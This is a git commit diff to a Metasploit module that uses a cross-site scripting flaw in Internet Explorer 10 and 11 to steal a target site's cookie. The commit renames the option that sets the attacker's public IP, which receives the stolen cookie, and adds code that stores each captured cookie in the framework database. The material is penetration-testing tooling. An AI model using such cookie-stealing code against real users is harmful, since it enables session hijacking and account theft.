Change public ip option name and store cookie to db

bug/bundler_fix
sinn3r 2015-02-05 09:48:45 -06:00
parent 75c697c4dc
commit ed6ee27896
1 changed files with 10 additions and 5 deletions

View File

@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary
'Description' => %q{
This module exploits a universal cross-site scripting vulnerability found in Internet
Explorer 10 and 11. It will steal the cookie of a specific webiste (set by the TARGET_URI
datastore option). You will also most likely need to configure the SERVER_PUBLIC_IP
datastore option). You will also most likely need to configure the MY_PUBLIC_IP
datastore option in order receive the cookie. If you and the victim are actually in the
same network, then you don't need to touch SERVER_PUBLIC_IP.
same network, then you don't need to touch MY_PUBLIC_IP.
},
'License' => MSF_LICENSE,
'Author' =>
@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptString.new('TARGET_URI', [ true, 'The URL for the target iframe' ]),
OptString.new('SERVER_PUBLIC_IP', [ false, 'The exploit\'s public facing IP (Default: Internal IP)']),
OptString.new('MY_PUBLIC_IP', [ false, 'The exploit\'s public facing IP (Default: Internal IP)']),
], self.class)
end
@ -67,8 +67,8 @@ class Metasploit3 < Msf::Auxiliary
proto = (ssl ? "https://" : "http://")
if datastore['URIHOST']
host = datastore['URIHOST']
elsif datastore['SERVER_PUBLIC_IP']
host = datastore['SERVER_PUBLIC_IP']
elsif datastore['MY_PUBLIC_IP']
host = datastore['MY_PUBLIC_IP']
elsif (cli and cli.peerhost)
host = Rex::Socket.source_address(cli.peerhost)
else
@ -134,6 +134,11 @@ class Metasploit3 < Msf::Auxiliary
else
print_status("Got cookie")
print_line(data)
report_note(
:host => cli.peerhost,
:type => 'ie.cookie',
:data => data
)
end
else
print_status("sending html")